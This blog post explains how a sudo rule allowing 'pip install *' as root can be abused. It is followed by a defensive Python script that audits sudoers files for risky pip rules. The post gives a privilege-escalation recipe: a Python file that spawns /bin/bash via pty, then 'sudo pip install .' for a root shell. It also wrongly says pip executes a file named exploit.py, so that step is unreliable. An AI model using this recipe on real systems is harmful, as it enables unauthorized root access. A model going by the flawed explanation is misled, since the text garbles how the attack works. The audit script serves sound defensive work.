Little mistake that kills

Hi All,

Today I am writing about a small mistake that a system admin might make when configuring their Linux system.

As usual, after the admin configures the system they give users the privilege to run certain commands as admin, which we call sudo. But sometimes the admin is not careful: to stop the user from bugging them too much, they just enable whatever the user asks for without any security risk analysis.

There are a lot of commands that should not simply be handed to a user via sudo, because by using them the user can escalate to a level that endangers the system.

Below is one command that is dangerous to grant to a user through sudo:

(root) /usr/bin/pip install *

The above command is pip, the package installer for Python. Admins usually grant it so that developer users can install the additional Python packages they need. So what is the deal? With that command granted, the user can run sudo pip <malicious_command> to escalate privileges by installing a malicious script.

Let's do the exploitation. Create a Python script called exploit.py in a directory, just like the script below:

import pty
pty.spawn("/bin/bash")  # spawn an interactive shell

Save it.

After that, run this command in the same directory:

sudo pip install .

The pip install will execute exploit.py and run the commands in the file, which spawns a shell.

Since the script is run with the privileges of root, the shell that was just spawned is in the root context.

So .. now you have escalated to root.

Easy right..

This kind of mistake is just very ridiculous … usually done by the lazy admin .. 🙂
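The fix is not to grant sudo pip at all: developers can install their own packages into a virtualenv they own (python3 -m venv ~/venv) or with pip install --user, neither of which needs root. To find the rule the post describes before someone else does, here is a small sudoers audit script, added as an example and not part of the original post. It parses plain user-specification lines (not Cmnd_Alias expansion), flags any rule whose command is pip/pip2/pip3, and rates it high when the arguments are unrestricted or contain a wildcard, because in both cases the invoking user decides what pip installs and pip runs that package's install code as the target user. The sudoers content below is constructed for the demo; the user names in it are made up.

```python
import os
import re
from typing import Dict, List

# Constructed sample sudoers content for the demo; not taken from any real system.
SAMPLE_SUDOERS = """\
# User privilege specification
root    ALL=(ALL:ALL) ALL
dev     ALL=(root) /usr/bin/pip install *
alice   ALL=(root) NOPASSWD: /usr/bin/pip
bob     ALL=(root) /usr/bin/systemctl restart nginx
carol   ALL=(ALL) /usr/local/bin/pip3 install *
eve     ALL=(root) /usr/bin/pip install requests
"""

# One user-specification line: user host=(runas) [TAG:] command [args] [, command ...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)
PIP_NAME_RE = re.compile(r"^pip[0-9.]*$")  # pip, pip2, pip3, pip3.11 ...
TAG_RE = re.compile(r"^(?:[A-Z_]+:\s*)+")  # NOPASSWD:, SETENV:, NOEXEC: ...
SKIP_PREFIXES = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")


def parse_sudoers(text: str) -> List[Dict]:
    """Turn user-specification lines into one dict per (user, runas, command)."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments (and #include lines)
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        # "(user:group)" -> keep the user part; sudoers defaults the target user to root
        runas = (m.group("runas") or "root").split(":")[0]
        for spec in m.group("cmds").split(","):
            spec = TAG_RE.sub("", spec.strip())
            tokens = spec.split()
            if not tokens:
                continue
            rules.append({"user": m.group("user"), "runas": runas,
                          "binary": tokens[0], "args": tokens[1:]})
    return rules


def find_risky_pip_rules(rules: List[Dict]) -> List[Dict]:
    """Flag every rule whose command is pip; rate by how much the user controls the arguments."""
    findings = []
    for r in rules:
        if not PIP_NAME_RE.match(os.path.basename(r["binary"])):
            continue
        if not r["args"]:
            # A command with no arguments listed matches ANY arguments in sudoers.
            severity, reason = "high", "no argument restriction: any pip subcommand and package allowed"
        elif any("*" in a for a in r["args"]):
            severity, reason = "high", "wildcard argument: the user chooses what gets installed"
        else:
            severity, reason = "review", "arguments are pinned, but still a root-run package install"
        findings.append({**r, "severity": severity, "reason": reason})
    return findings


def audit(text: str) -> List[Dict]:
    return find_risky_pip_rules(parse_sudoers(text))


def format_report(findings: List[Dict]) -> str:
    lines = []
    for f in findings:
        cmd = " ".join([f["binary"], *f["args"]])
        lines.append(f'[{f["severity"]:6}] {f["user"]} -> ({f["runas"]}) {cmd}: {f["reason"]}')
    return "\n".join(lines) if lines else "no pip rules found"


if __name__ == "__main__":
    print(format_report(audit(SAMPLE_SUDOERS)))
```

On a real host, run the same audit over /etc/sudoers and every file in /etc/sudoers.d (readable only as root); remember that rules hidden behind a Cmnd_Alias are not expanded here, and that `sudo -l` run as the developer account shows the effective rules from the user's side.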
